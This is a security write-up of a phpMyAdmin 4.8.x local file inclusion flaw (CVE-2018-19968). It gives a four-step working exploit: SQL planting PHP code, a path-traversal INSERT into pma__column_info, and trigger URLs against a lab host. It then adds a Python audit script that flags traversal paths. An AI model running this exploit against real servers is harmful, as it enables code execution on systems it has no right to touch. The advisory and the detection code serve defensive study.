phpMyAdmin 4.8.0~4.8.3 Local File Inclusion in Transformation Feature (PMASA-2018-6/CVE-2018-19968)


On December 07, 2018, phpMyAdmin released a security bulletin PMASA-2018-6 to fix a local file reading vulnerability caused by the Transformation feature.

The Transformation feature of phpMyAdmin lets some columns be displayed in a specific way when they are selected from a table. For example, it can turn links stored as plain text into clickable links when rendering them.

More about Transformations: Transformations - phpMyAdmin 5.0.0-dev documentation

VulnSpy's online phpMyAdmin 4.8.1 environment: https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1

VULNERABILITY DETAILS

PHPMyAdmin multiple vulnerabilities - Sec Team Blog

EXPLOIT

  1. Create a new database foo with an arbitrary table bar containing a column baz, and insert a row whose data contains PHP code (to fill the session with some PHP code):

CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

  2. Visit http://pma.vsplate.me/chk_rel.php?fixall_pmadb=1&db=foo to create the phpMyAdmin system tables in your database.

  3. Fill in the transformation information, with the path traversal, in the pma__column_info table. Replace sess_*** with your session ID (the value of the phpMyAdmin cookie):

INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../../../../../../../tmp/sess_***','plop';

  4. Visit http://pma.vsplate.me/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 to trigger the vulnerability.
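For defenders, the row written in step 3 is the durable artifact of this issue: a transformation file name in pma__column_info that resolves outside the plugin directory. The audit below is an added example, not code from the original write-up or from phpMyAdmin. The column names transformation and input_transformation are assumed from phpMyAdmin's configuration-storage schema, and PLUGIN_BASE and the sample rows are constructed for illustration.

```python
import posixpath

# Hypothetical base directory, used only to test whether a value escapes it.
PLUGIN_BASE = "/pma/libraries/classes/Plugins/Transformations"
# Columns of pma__column_info that name a transformation file (assumed from
# phpMyAdmin's configuration-storage schema; the page does not list them).
FILE_COLUMNS = ("transformation", "input_transformation")


def escapes_base(value: str) -> bool:
    """True if value, resolved under PLUGIN_BASE, leaves that directory."""
    if not value:
        return False
    if "\x00" in value or "\\" in value or value.startswith("/"):
        return True
    resolved = posixpath.normpath(posixpath.join(PLUGIN_BASE, value))
    return not resolved.startswith(PLUGIN_BASE + "/")


def audit_column_info(rows):
    """Return (db, table, column, field, value) for every suspicious entry."""
    findings = []
    for row in rows:
        for field in FILE_COLUMNS:
            value = row.get(field) or ""
            if escapes_base(value):
                findings.append((row["db_name"], row["table_name"],
                                 row["column_name"], field, value))
    return findings


# Constructed sample rows: one benign, one shaped like the row in step 3.
SAMPLE_ROWS = [
    {"db_name": "shop", "table_name": "items", "column_name": "url",
     "transformation": "output/text_plain_link.php",
     "input_transformation": ""},
    {"db_name": "foo", "table_name": "bar", "column_name": "baz",
     "transformation": "plop",
     "input_transformation": "../../../../../../../../tmp/sess_PLACEHOLDER"},
]

if __name__ == "__main__":
    for finding in audit_column_info(SAMPLE_ROWS):
        print("suspicious transformation path:", finding)
```

In practice the rows would come from a SELECT over pma__column_info in every database that holds the configuration storage tables, since step 2 shows they can be created in a user-chosen database.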
